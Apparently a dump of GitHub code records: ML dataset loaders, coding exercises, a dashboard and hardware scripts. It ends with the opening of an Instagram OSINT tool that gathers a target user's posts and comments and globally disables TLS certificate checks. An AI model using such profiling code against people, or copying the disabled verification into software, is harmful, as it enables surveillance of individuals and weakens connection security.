ckpt_path = os.path.join(ckpt_dir, 'list.pickle')\n if not os.path.exists(ckpt_path):\n idx = torch.randperm(len(teset))\n idx = [i.item() for i in idx]\n with open(ckpt_path, 'wb') as f:\n pickle.dump(idx, f)\n else:\n with open(ckpt_path, 'rb') as f:\n idx = pickle.load(f)\n teset = torch.utils.data.Subset(teset, idx)\n\n teloader = torch.utils.data.DataLoader(teset, batch_size=batch_size, shuffle=False, num_workers=workers,\n pin_memory=True)\n return teset, teloader\n\n\ndef load_cifar10(root, batch_size=64, workers=4, split=\"train\", transforms=None):\n assert os.path.exists(root), 'CIFAR10 root path does not exist: {}'.format(root)\n if split == 'train':\n dataset = torchvision.datasets.CIFAR10(root=root, train=True,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n elif split == 'val':\n dataset = torchvision.datasets.CIFAR10(root=root, train=False,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n elif split == 'all':\n dataset = torchvision.datasets.CIFAR10(root=root, train=True,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n dataset2 = torchvision.datasets.CIFAR10(root=root, train=False,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n dataset = torch.utils.data.ConcatDataset([dataset, dataset2])\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True,\n num_workers=workers, pin_memory=True)\n\n return dataset, data_loader\n\n\ndef load_cifar100(root, batch_size=64, workers=4, split=\"train\", transforms=None):\n assert os.path.exists(root), 'CIFAR100 root path does not exist: {}'.format(root)\n if split == 'train':\n dataset = torchvision.datasets.CIFAR100(root=root, train=True,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n elif split == 'val':\n dataset = torchvision.datasets.CIFAR100(root=root, train=False,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n elif split == 'all':\n dataset = torchvision.datasets.CIFAR100(root=root, train=True,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n dataset2 = torchvision.datasets.CIFAR100(root=root, train=False,\n transform=torchvision.transforms.ToTensor() if transforms is None else transforms)\n dataset = torch.utils.data.ConcatDataset([dataset, dataset2])\n else:\n raise ValueError(f'Unknown split: {split}')\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True,\n num_workers=workers, pin_memory=True)\n return dataset, data_loader\n\n\ndef load_imagenet(root, batch_size=64, workers=1, split=\"val\", transforms=None, ckpt=None):\n assert os.path.exists(root), 'ImageNet root path does not exist: {}'.format(root)\n dataset = torchvision.datasets.ImageNet(root=os.path.join(root, 'ImageNet'), split=split,\n transform=te_transforms if transforms is None else transforms)\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True,\n num_workers=workers, pin_memory=True)\n\n return dataset, data_loader\n\n\ndef load_domainnet126(root, domain, transforms, batch_size=64, workers=4, split='train'):\n assert os.path.exists(root), 'DomainNet root path does not exist: {}'.format(root)\n assert domain in ['clipart', 'painting', 'real', 'sketch'], f'Unknown domain: {domain}'\n\n if split == 'train':\n dataset = DomainNet126(root=root, transform=transforms, domain=domain, train=True, download=True)\n elif split == 'val':\n dataset = DomainNet126(root=root, transform=transforms, domain=domain, train=False, download=True)\n elif split == 'all':\n train_dataset = DomainNet126(root=root, transform=transforms, domain=domain, train=True,\n download=True)\n val_dataset = DomainNet126(root=root, transform=transforms, domain=domain, train=False,\n download=True)\n dataset = torch.utils.data.ConcatDataset([train_dataset, val_dataset])\n data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=workers,\n pin_memory=True)\n return dataset, data_loader\n\n\ndef load_officehome(root, domain, transforms=None, batch_size=64, workers=4, split='train'):\n data_dir = os.path.join(root, 'office-home')\n\n txt_train_path = os.path.join(data_dir, domain + \"_train.pickle\")\n txt_test_path = os.path.join(data_dir, domain + \"_test.pickle\")\n\n txt_src = open(os.path.join(data_dir, domain + '_list.txt')).readlines()\n\n dsize = len(txt_src)\n tr_size = int(0.9 * dsize)\n if not os.path.exists(txt_train_path) or not os.path.exists(txt_test_path):\n tr_txt, te_txt = torch.utils.data.random_split(txt_src, [tr_size, dsize - tr_size])\n with open(txt_train_path, 'wb') as f:\n pickle.dump(tr_txt, f)\n with open(txt_test_path, 'wb') as f:\n pickle.dump(te_txt, f)\n else:\n with open(txt_train_path, 'rb') as f:\n tr_txt = pickle.load(f)\n with open(txt_test_path, 'rb') as f:\n te_txt = pickle.load(f)\n\n if split == \"train\":\n dataset = ImageList(tr_txt, transform=image_train() if transforms is None else transforms)\n elif split == \"val\":\n dataset = ImageList(te_txt, transform=image_test() if transforms is None else transforms)\n elif split == \"all\":\n all_txt = tr_txt + te_txt\n dataset = ImageList(all_txt, transform=image_test() if transforms is None else transforms)\n\n dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=workers, drop_last=False)\n return dataset, dataloader\n\n\ndef load_dataset(dataset, root, batch_size=64, workers=4, split='train', adaptation=None, domain=None,\n level=None, ckpt=None, num_aug=1, transforms=None):\n transforms = get_transform(dataset, adaptation, num_aug) if transforms is None else transforms\n if dataset == 'cifar10':\n return load_cifar10(root=root, batch_size=batch_size, workers=workers, split=split, transforms=transforms)\n elif dataset == 'cifar100':\n return load_cifar100(root=root, batch_size=batch_size, workers=workers, split=split, transforms=transforms)\n elif dataset == 'imagenet':\n return load_imagenet(root=root, batch_size=batch_size, workers=workers, split=split, transforms=transforms,\n ckpt=ckpt)\n elif dataset == 'domainnet126':\n return load_domainnet126(root=root, domain=domain, batch_size=batch_size, workers=workers, split=split,\n transforms=transforms)\n elif dataset == 'cifar10_c':\n return load_cifar10_c(root=root, corruption=domain, level=level, batch_size=batch_size, workers=workers,\n transforms=transforms, ckpt=ckpt)\n elif dataset == 'cifar100_c':\n return load_cifar100_c(root=root, corruption=domain, level=level, batch_size=batch_size, workers=workers,\n transforms=transforms, ckpt=ckpt)\n elif dataset == 'imagenet_c':\n return load_imagenet_c(root=os.path.join(root, 'ImageNet-C'), batch_size=batch_size, corruption=domain,\n level=level, workers=workers,\n transforms=transforms, ckpt=ckpt)\n elif dataset == 'officehome':\n return load_officehome(root=root, domain=domain, batch_size=batch_size, workers=workers, split=split,\n transforms=transforms)\n else:\n raise ValueError('Unknown dataset: {}'.format(dataset))\n\n\ndef load_dataset_idx(dataset, root, batch_size=64, workers=4, split='train', adaptation=None, domain=None,\n level=None, ckpt=None, num_aug=1):\n dataset, _ = load_dataset(dataset, root, batch_size, workers, split, adaptation, domain, level, ckpt, num_aug)\n dataset_idx = Dataset_Idx(dataset)\n data_loader = torch.utils.data.DataLoader(dataset_idx, batch_size=batch_size, shuffle=False, num_workers=workers,\n drop_last=False)\n return dataset_idx, data_loader\n","repo_name":"yuyongcan/Benchmark-TTA","sub_path":"src/data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":16932,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"21"} +{"seq_id":"16059001894","text":"\"\"\"\n-*- coding: utf-8 -*-\n@File : 括号生成.py\n@Time : 2022/4/21\n@Author: Tk \n@Software: PyCharm\n核心思想:添加(后进入递归之后再pop操作,\n暴力和回溯的不同就在于验证列表是否符合规范是用额外函数验证还是在添加元素本身上做限制\n输入:\n3\n输出:\n[\"((()))\",\"(()())\",\"(())()\",\"()(())\",\"()()()\"]\n\"\"\"\n\n\n# class Solution:\n# def generateParenthesis(self, n: int):\n# def generate(A):\n# if len(A) == 2*n:\n# if valid(A):\n# # 如果A的验证没有问题,则将A连起来形成一个完整的组合\n# ans.append(\"\".join(A))\n# else:\n# A.append('(')\n# generate(A)\n# A.pop()\n# A.append(')')\n# generate(A)\n# A.pop()\n#\n# def valid(A):\n# bal = 0\n# for c in A:\n# if c == '(':\n# bal += 1\n# else:\n# bal -= 1\n# # 多余的 ) 在 ( 之前出现了,后面就不需要看了\n# if bal < 0:\n# return False\n# return bal == 0\n#\n# ans = []\n# generate([])\n# return ans\n\n\nclass Solution:\n def generateParenthesis(self, n: int):\n ans = []\n def backtrack(S, left, right):\n if len(S) == 2 * n:\n # 将S的有效性检验放到函数内部去实现,能到2*n个字符时一定是有效的\n ans.append(''.join(S))\n return\n if left < n:\n S.append('(')\n backtrack(S, left+1, right)\n S.pop()\n if right < left:\n S.append(')')\n backtrack(S, left, right+1)\n S.pop()\n\n backtrack([], 0, 0)\n return ans\n\n\nnum = int(input())\ns = Solution()\nresult = s.generateParenthesis(num)\nprint(result)\n","repo_name":"looking-for-my-magic-bean/leetcode","sub_path":"TOP100/字符串/括号生成.py","file_name":"括号生成.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72195651253","text":"import json\nimport sys\n\nmax_num = 500\n\ndata_directory = \"../data/\"\nfiles = [\"debatepedia.json\", \"debatewise.json\", \"idebate.json\", \"parliamentary.json\", \"debateorg.json\"]\n# files = [\"parliamentary.json\", \"idebate.json\"]\n\nfor f in files:\n with open(data_directory + f) as json_file:\n data = json.load(json_file)\n arg_num = 0\n iteration = 0\n result = \"\"\n for arg in data[\"arguments\"]:\n arg_num += 1\n result += \"{\\\"index\\\": {}}\\n\"\n result += json.dumps(arg)\n result += \"\\n\"\n if arg_num > max_num:\n f_write = open(data_directory + \"splits/\" + f.split(\".\")[0] + \"_\" + str(iteration) + \".json\", \"w\")\n f_write.write(result)\n f_write.close()\n iteration += 1\n arg_num = 0\n result = \"\"\n if result != \"\":\n f_write = open(data_directory + \"splits/\" + f.split(\".\")[0] + \"_\" + str(iteration) + \".json\", \"w\")\n f_write.write(result)\n f_write.close()\n\n","repo_name":"nz63paxe/IR","sub_path":"scripts/json_for_elasticsearch.py","file_name":"json_for_elasticsearch.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20003838387","text":"import dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output, State\r\nfrom web_app.app import app\r\nimport pandas as pd\r\nfrom web_app.apps.helpers.helper_functions import get_tweets, get_polarity\r\n\r\ndf = pd.read_csv(\"/mnt/data/Events/CODE19/smart-disease-prediction-dashboard/\")\r\n\r\nCOLUMNS = ['ARPU', 'Internet Usage', 'SMS Usage', 'Voice Usage']\r\n\r\nCOLORS = {\r\n 'background': '#1e1e2a',\r\n 'figure-background': '#28283c',\r\n 'text': '#77d1d6',\r\n}\r\n\r\nTWEET = '''Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam ex magna, aliquet in magna in, \r\n faucibus vestibulum enim. Suspendisse ut commodo augue. Proin vel facilisis sem. Quisque eget \r\n mauris eu velit dictum auctor. Fusce lacinia nisl at ultrices aliquam. Nulla urna risus.'''\r\n\r\ncustomer_id = 1\r\nMONTHS = ['August', 'September', 'October', 'November', 'December', 'January']\r\n\r\nSEGMENTS = list(df['Customer Segment'].unique())\r\n\r\n\r\ndef generate_scatter_plot(xaxis_column_name, yaxis_column_name,\r\n xaxis_type, yaxis_type):\r\n # traces = []\r\n # for i in df['Customer Segment'].unique():\r\n # df_by_segment = df[df['Customer Segment'] == i]\r\n # traces.append(dict(\r\n # x=df_by_segment[xaxis_column_name].unique(),\r\n # y=df_by_segment[yaxis_column_name].unique(),\r\n # mode='markers',\r\n # opacity=0.7,\r\n # marker={\r\n # 'size': 5,\r\n # # 'line': {'width': 0.5, 'color': 'white'}\r\n # },\r\n # name=i\r\n # ))\r\n return {\r\n # 'data': traces,\r\n 'data': [\r\n {\r\n 'x': df[xaxis_column_name].unique(),\r\n 'y': df[yaxis_column_name].unique(),\r\n # 'x': df[xaxis_column_name],\r\n # 'y': df[yaxis_column_name],\r\n 'mode': 'markers',\r\n 'marker': {\r\n 'color': COLORS['text'],\r\n 'size': 5,\r\n },\r\n },\r\n ],\r\n 'layout': {\r\n 'title': 'Customer Segments Scatter Plot',\r\n 'showlegend': False,\r\n 'colorscale': 'balance',\r\n 'legend': {\r\n 'x': 0,\r\n 'y': 1.0\r\n },\r\n 'plot_bgcolor': COLORS['figure-background'],\r\n 'paper_bgcolor': COLORS['figure-background'],\r\n 'font': {\r\n 'color': COLORS['text']\r\n },\r\n 'transition': {\r\n 'duration': 1500\r\n },\r\n 'xaxis': {\r\n 'title': xaxis_column_name,\r\n 'type': 'linear' if xaxis_type == 'Linear' else 'log',\r\n },\r\n 'yaxis': {\r\n 'title': yaxis_column_name,\r\n 'type': 'linear' if yaxis_type == 'Linear' else 'log'\r\n },\r\n }\r\n }\r\n\r\n\r\ndef generate_bar_graph():\r\n segment_dict = dict(df['Customer Segment'].value_counts())\r\n widths = [0.5] * len(list(segment_dict.values()))\r\n return {\r\n 'data': [\r\n {\r\n 'x': list(segment_dict.values()),\r\n 'y': list(segment_dict.keys()),\r\n 'name': 'Internet Usage',\r\n 'type': 'bar',\r\n 'orientation': 'h',\r\n 'width': widths,\r\n 'marker': {\r\n 'color': '#ff9d76',\r\n }\r\n },\r\n ],\r\n 'layout': {\r\n 'title': 'Distribution of Users',\r\n 'showlegend': False,\r\n 'colorscale': 'balance',\r\n # 'legend': {\r\n # 'x': 0,\r\n # 'y': 1.0\r\n # },\r\n 'plot_bgcolor': COLORS['figure-background'],\r\n 'paper_bgcolor': COLORS['figure-background'],\r\n 'font': {\r\n 'color': COLORS['text']\r\n },\r\n 'transition': {\r\n 'duration': 1500\r\n },\r\n 'xaxis': {\r\n 'title': 'Number of Customers',\r\n },\r\n 'yaxis': {\r\n 'title': 'Customer Segments',\r\n },\r\n }\r\n }\r\n\r\n\r\ndef generate_pie_chart():\r\n return {\r\n 'data': [\r\n {\r\n 'values': get_polarity(),\r\n 'type': 'pie',\r\n 'labels': ['Negative', 'Positive', 'Neutral'],\r\n 'hoverinfo': 'label+percent',\r\n 'marker': {\r\n 'colors': ['#ff9d76', '#00adb5']\r\n },\r\n },\r\n ],\r\n 'layout': {\r\n 'plot_bgcolor': COLORS['background'],\r\n 'paper_bgcolor': COLORS['background'],\r\n 'font': {\r\n 'color': COLORS['text']\r\n },\r\n 'showlegend': False,\r\n }\r\n }\r\n\r\n\r\nlayout = html.Div([\r\n html.Div([\r\n html.Div([\r\n html.H3(\r\n html.Strong(\r\n '''\r\n ANALYTICS DASHBOARD\r\n ''', id='customdash'),\r\n ),\r\n ], className='one-half column'),\r\n\r\n html.Div([\r\n html.Div([\r\n dcc.Dropdown(\r\n id='crossfilter-xaxis-column',\r\n options=[{'label': i, 'value': i} for i in COLUMNS],\r\n value='ARPU'\r\n ),\r\n dcc.RadioItems(\r\n id='crossfilter-xaxis-type',\r\n options=[{'label': i, 'value': i} for i in ['Linear', 'Log']],\r\n value='Linear',\r\n labelStyle={'display': 'inline-block'}\r\n )\r\n ], className='one-half column', id='xaxis'),\r\n html.Div([\r\n dcc.Dropdown(\r\n id='crossfilter-yaxis-column',\r\n options=[{'label': i, 'value': i} for i in COLUMNS],\r\n value='Internet Usage'\r\n ),\r\n dcc.RadioItems(\r\n id='crossfilter-yaxis-type',\r\n options=[{'label': i, 'value': i} for i in ['Linear', 'Log']],\r\n value='Linear',\r\n labelStyle={'display': 'inline-block'}\r\n )\r\n ], className='one-half column', id='yaxis')\r\n ], className='one-half column container')\r\n ], className='container'),\r\n\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(\r\n id='overall-scatter-plot',\r\n style={'width': '100%'},\r\n figure=generate_scatter_plot('ARPU', 'Internet Usage', 'Linear', 'Linear')\r\n )\r\n ], className='one-half column', style={'width': '48%'}),\r\n\r\n html.Div([\r\n dcc.Graph(\r\n id='overall-bar-graph',\r\n figure=generate_bar_graph()\r\n ),\r\n ], className='one-half column'),\r\n\r\n ], className='container'),\r\n\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Strong('LIVE TWEETS', id='tweet-title', className='titles', style={'float': 'left'}),\r\n html.Button([\r\n 'REFRESH'\r\n ], id='refresh-button', className='two columns'),\r\n ]),\r\n html.Div([\r\n get_tweets()\r\n ], id='tweet-container')\r\n ], className='eight columns', id='tweet-display'),\r\n html.Div([\r\n html.Strong('TWEET POLARITY', className='titles'),\r\n html.Div([\r\n dcc.Graph(\r\n id='polarity-pie-chart',\r\n figure=generate_pie_chart()\r\n )\r\n ])\r\n ], className='four columns', id='tweet-polarity-display')\r\n ], className='container'),\r\n ], id='last-div'),\r\n\r\n html.Div([\r\n html.Button([\r\n dcc.Link('PREDICTION DASHBOARD', href='/apps/customer_dashboard')\r\n ], id='page2-link', className='three columns'),\r\n ], className='container', id='page2-link-container')\r\n\r\n])\r\n\r\n\r\n@app.callback(\r\n Output('overall-scatter-plot', 'figure'),\r\n [Input('crossfilter-xaxis-column', 'value'),\r\n Input('crossfilter-yaxis-column', 'value'),\r\n Input('crossfilter-xaxis-type', 'value'),\r\n Input('crossfilter-yaxis-type', 'value')],\r\n)\r\ndef update_scatter_plot(xaxis_column, yaxis_column, xaxis_type, yaxis_type):\r\n return generate_scatter_plot(xaxis_column, yaxis_column, xaxis_type, yaxis_type)\r\n\r\n\r\n@app.callback(\r\n Output('tweet-container', 'children'),\r\n [Input('refresh-button', 'n_clicks')],\r\n # [State('customer-id', 'value')]\r\n)\r\ndef service_usage_graph(n_clicks):\r\n return get_tweets()\r\n","repo_name":"Debanitrkl/smart-disease-prediction-dashboard","sub_path":"web_app/apps/world_dashboard.py","file_name":"world_dashboard.py","file_ext":"py","file_size_in_byte":8776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74814675891","text":"# Program to concatenate arrays\r\n# J. Raghuramjee - 121910313004\r\n\r\n# Taking inputs\r\nn = int(input(\"Enter the number of arrays you want to concatenate : \"))\r\narr = []\r\nfor i in range(n):\r\n a = []\r\n size = int(input(\"Enter the size of array \" + str(i+1) + \" : \"))\r\n print(\"Enter the elements of array\", i+1, \":\")\r\n for i in range(size):\r\n ele = input()\r\n a.append(ele)\r\n arr.append(a)\r\n\r\n# Printing the arrays\r\nprint(\"The arrays are : \")\r\nfor i in arr:\r\n print(i)\r\n\r\n# Logic to concatenate arrays\r\nres = []\r\nfor i in arr:\r\n res += i\r\n\r\n# Printing the result\r\nprint(\"The concatenated array is :\")\r\nprint(res)\r\n\r\n\r\n","repo_name":"121910313014/pythonprograms","sub_path":"L-3 ASSIGNMENT-1-ARRAY-CONCATENATION.py","file_name":"L-3 ASSIGNMENT-1-ARRAY-CONCATENATION.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39342883141","text":"import numpy as np\n\nfrom kernel_tuner.observers.observer import BenchmarkObserver\n\n# check if powersensor is installed\ntry:\n import powersensor\nexcept ImportError:\n powersensor = None\n\n\nclass PowerSensorObserver(BenchmarkObserver):\n \"\"\"Observer that an external PowerSensor2 device to accurately measure power\n\n Requires PowerSensor2 hardware and powersensor Python bindings.\n\n :param observables: A list of string, containing any of \"ps_energy\" or \"ps_power\".\n To measure energy in Joules or power consumption in Watt.\n If not passed \"ps_energy\" is used to report energy consumption of kernels in Joules.\n :type observables: list\n\n :param device: A string with the path to the PowerSensor2 device, default \"/dev/ttyACM0\".\n :type device: string\n\n \"\"\"\n\n def __init__(self, observables=None, device=None):\n if not powersensor:\n raise ImportError(\"could not import powersensor\")\n\n supported = [\"ps_energy\", \"ps_power\"]\n for obs in observables:\n if not obs in supported:\n raise ValueError(f\"Observable {obs} not in supported: {supported}\")\n self.observables = observables or [\"ps_energy\"]\n\n device = device or \"/dev/ttyACM0\"\n self.ps = powersensor.PowerSensor(device)\n\n self.begin_state = None\n self.results = {key: [] for key in self.observables}\n\n def after_start(self):\n self.begin_state = self.ps.read()\n\n def after_finish(self):\n end_state = self.ps.read()\n if \"ps_energy\" in self.observables:\n ps_measured_e = powersensor.Joules(\n self.begin_state, end_state, -1\n ) # Joules\n self.results[\"ps_energy\"].append(ps_measured_e)\n if \"ps_power\" in self.observables:\n ps_measured_t = (\n end_state.time_at_read - self.begin_state.time_at_read\n ) # seconds\n self.results[\"ps_power\"].append(ps_measured_e / ps_measured_t) # Watt\n\n def get_results(self):\n averages = {key: np.average(values) for key, values in self.results.items()}\n self.results = {key: [] for key in self.observables}\n return averages\n","repo_name":"bouweandela/kernel_tuner","sub_path":"kernel_tuner/observers/powersensor.py","file_name":"powersensor.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"34118860274","text":"import pyttsx3\r\nimport sys\r\nimport os\r\n\r\ndef is_valid_file_name(file_name):\r\n invalid_characters = \"\\\\/:*?\\\"<>|\"\r\n for character in invalid_characters:\r\n if character in file_name:\r\n return False\r\n return True\r\n\r\ndef convert_line_to_mp3(text, output_file_path):\r\n engine = pyttsx3.init()\r\n tts_voices = engine.getProperty('voices')\r\n engine.setProperty('voice', tts_voices[1].id)\r\n engine.save_to_file(text, output_file_path)\r\n engine.runAndWait()\r\n\r\ndef convert_dir_to_mp3(input_directory, output_directory):\r\n if not os.path.exists(input_directory):\r\n print('Input directory does not exist')\r\n sys.exit(1)\r\n if not os.path.exists(output_directory):\r\n os.makedirs(output_directory)\r\n for root, dirs, files in os.walk(input_directory):\r\n for file in files:\r\n if file.endswith(\".txt\"):\r\n file_path = os.path.join(root, file)\r\n with open(file_path, 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n line = line.strip()\r\n if len(line) == 0:\r\n continue\r\n if is_valid_file_name(line):\r\n if line[-1] == '.': line = line[:-1]\r\n output_file_path = os.path.join(output_directory, line + '.mp3')\r\n convert_line_to_mp3(line, output_file_path)\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) != 3:\r\n print('Wrong usage, instead try: python ttsfiles.py input_directory output_directory')\r\n sys.exit(1)\r\n convert_dir_to_mp3(sys.argv[1], sys.argv[2])\r\n","repo_name":"cezar06/Python","sub_path":"proiect_tts/ttsfiles.py","file_name":"ttsfiles.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41328689640","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 21 09:35:06 2020\n\n@author: Helene Stabell\n\"\"\"\n\n\n\ndef to_camel_case(text):\n words = text.split()\n sep_camels = []\n str1 = \"\" \n \n for word in words:\n capt = word.capitalize()\n sep_camels.append(capt)\n \n return (str1.join(sep_camels)) \n \n\n## question 2b)\n \ndef to_snake_case(text):\n capitals = set('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n sep_snake = []\n str1 = \"\"\n \n for character in text:\n if character in capitals:\n c = '_' + (str(character)).lower()\n sep_snake.append(c) \n elif character.isnumeric():\n sep_snake.append('_'+character+'_')\n elif character == ' ':\n print('Wrong format dude! Try again.')\n else:\n sep_snake.append(character)\n \n output_line = str(str1.join(sep_snake))\n return (output_line[1:-1].replace('__','_'))","repo_name":"HeleneS1/checkpoint_week3","sub_path":"question_2.py","file_name":"question_2.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19142454567","text":"def create_table():\n '''\n Docstring explaines function\n DOCSTRING: information about the function\n INPUT: no input\n OUTPUT: returns list of lists to set 6x6 table to play tic tac toe\n '''\n tab = [] \n for i in range(3):\n tab.append (list(('_', '_', '_')))\n return tab\n\ndef print_table(tab):\n for i in range(3):\n print(tab[i])\n \ndef turns (tab, player, row, col):\n tab[row-1][col-1] = player\n return tab\n\ndef check_turn (tab, player, flag):\n for i in range(3):\n if tab[i][0] == tab [i][1] == tab [i][2] == player:\n flag = True\n elif tab[0][i] == tab [1][i] == tab [2][i] == player:\n flag = True\n if tab[0][0] == tab[1][1] == tab[2][2] == player or tab[0][2] == tab[1][1] == tab[2][0] == player:\n flag = True\n \n if flag:\n print_table(tab)\n if player == 'X':\n print ('Player #1 is the winner!')\n else:\n print ('Player #2 is the winner!')\n return flag\n \ndef players_turns (tab, player):\n flag = False\n while flag == False:\n row = input ('Player #{}, your turn! Choose row (from 1 to 3): '.format(player))\n col = input ('Choose column (from 1 to 3): ')\n if is_number(row) and is_number(col):\n flag = correct_turn(tab, int(row), int(col))\n else:\n print ('One of the parameters is not integer number! Try again!')\n return int(row), int(col)\n\ndef correct_turn(tab, row, col):\n flag = True\n if row < 1 or row > 3 or col < 1 or col > 3:\n print ('Out of range! Try again!')\n flag = False\n elif tab[row-1][col-1] != '_':\n print ('This cell is occupied! Try again!')\n flag = False\n \n return flag\n\ndef is_number (s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n \ndef the_end (tab, flag):\n flag = True\n for i in range (3):\n for j in range (3):\n if tab[i][j] == '_':\n flag = False\n if flag:\n print ('The end!')\n return flag\n\ndef end_of_the_game(tab):\n for i in range(3):\n for j in range (3):\n if tab[i][j] == '_':\n return False\n \n \n \nturns_flag = False \ntable = create_table()\nplayer1 = 'X'\nplayer2 = 'O'\nplayer = ''\nend_flag = False\ncount_turns = 0\n\n\nwhile turns_flag == False:\n \n for i in range(1,3):\n if i == 1:\n player = player1\n else:\n player = player2\n \n print_table(table)\n turn_row, turn_col = players_turns(table, i)\n count_turns += 1\n print(count_turns)\n turns(table, player, turn_row, turn_col)\n turns_flag = check_turn (table, player, turns_flag)\n if turns_flag or count_turns == 9:\n turns_flag = True\n break\n","repo_name":"katepodbelnaya/python-exercises","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6858061164","text":"import cv2\nimport requests\nimport numpy as np\nfrom io import BytesIO\nimport time\n\n# Replace with the URL of your ESP32-CAM's MJPEG stream\nurl = \"http://192.168.6.135\"\n\n# Initialize variables for FPS calculation\nstart_time = time.time()\nframe_count = 0\n\nwhile True:\n # Open a connection to the ESP32-CAM's MJPEG stream\n print(\"Connecting to the stream...\")\n response = requests.get(url, stream=True)\n print(\"Connected to the stream.\")\n\n if response.status_code == 200:\n print(\"Got a response from the stream.\")\n bytes = bytes()\n for chunk in response.iter_content(chunk_size=1024):\n bytes += chunk\n a = bytes.find(b'\\xff\\xd8')\n b = bytes.find(b'\\xff\\xd9')\n if a != -1 and b != -1:\n jpg = bytes[a:b+2]\n bytes = bytes[b+2:]\n frame = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)\n\n # Calculate and print FPS\n frame_count += 1\n elapsed_time = time.time() - start_time\n if elapsed_time >= 1.0: # Update FPS every 1 second\n fps = frame_count / elapsed_time\n print(f\"FPS: {fps:.2f}\")\n frame_count = 0\n start_time = time.time()\n\n # Display the frame\n cv2.imshow(\"ESP32-CAM Live Stream\", frame)\n\n # Press 'q' to exit the stream\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n print(\"Failed to connect to the stream. Check the URL.\")\n\n# Release resources\ncv2.destroyAllWindows()\n","repo_name":"Dinesh-Kumar-E/SafeJourney-AI","sub_path":"Arduino/live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23166740296","text":"import datetime\nimport json\nimport sys\nimport urllib\nimport os\nimport codecs\nfrom pathlib import Path\n\nimport requests\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\nfrom geopy.geocoders import Nominatim\nfrom instagram_private_api import Client as AppClient\nfrom instagram_private_api import ClientCookieExpiredError, ClientLoginRequiredError, ClientError, ClientThrottledError\n\nfrom prettytable import PrettyTable\n\nfrom src import printcolors as pc\nfrom src import config\n\n\nclass Osintgram:\n api = None\n api2 = None\n geolocator = Nominatim(user_agent=\"http\")\n user_id = None\n target_id = None\n is_private = True\n following = False\n target = \"\"\n writeFile = False\n jsonDump = False\n cli_mode = False\n output_dir = \"output\"\n\n\n def __init__(self, target, is_file, is_json, is_cli, output_dir, clear_cookies):\n self.output_dir = output_dir or self.output_dir\n Path(self.output_dir).mkdir(parents=True, exist_ok=True)\n u = config.getUsername()\n p = config.getPassword()\n self.clear_cookies(clear_cookies)\n self.cli_mode = is_cli\n if not is_cli:\n print(\"\\nAttempt to login...\")\n self.login(u, p)\n self.setTarget(target)\n self.writeFile = is_file\n self.jsonDump = is_json\n\n def clear_cookies(self,clear_cookies):\n if clear_cookies:\n self.clear_cache()\n\n def setTarget(self, target):\n self.target = target\n user = self.get_user(target)\n self.target_id = user['id']\n self.is_private = user['is_private']\n self.following = self.check_following()\n self.__printTargetBanner__()\n\n def __get_feed__(self):\n data = []\n\n result = self.api.user_feed(str(self.target_id))\n data.extend(result.get('items', []))\n\n next_max_id = result.get('next_max_id')\n while next_max_id:\n results = self.api.user_feed(str(self.target_id), max_id=next_max_id)\n data.extend(results.get('items', []))\n next_max_id = results.get('next_max_id')\n\n return data\n\n def __get_comments__(self, media_id):\n comments = []\n\n result = self.api.media_comments(str(media_id))\n comments.extend(result.get('comments', []))\n\n next_max_id = result.get('next_max_id')\n while next_max_id:\n results = self.api.media_comments(str(media_id), max_id=next_max_id)\n comments.extend(results.get('comments', []))\n next_max_id = results.get('next_max_id')\n\n return comments\n\n def __printTargetBanner__(self):\n pc.printout(\"\\nLogged as \", pc.GREEN)\n pc.printout(self.api.username, pc.CYAN)\n pc.printout(\". Target: \", pc.GREEN)\n pc.printout(str(self.target), pc.CYAN)\n pc.printout(\" [\" + str(self.target_id) + \"]\")\n if self.is_private:\n 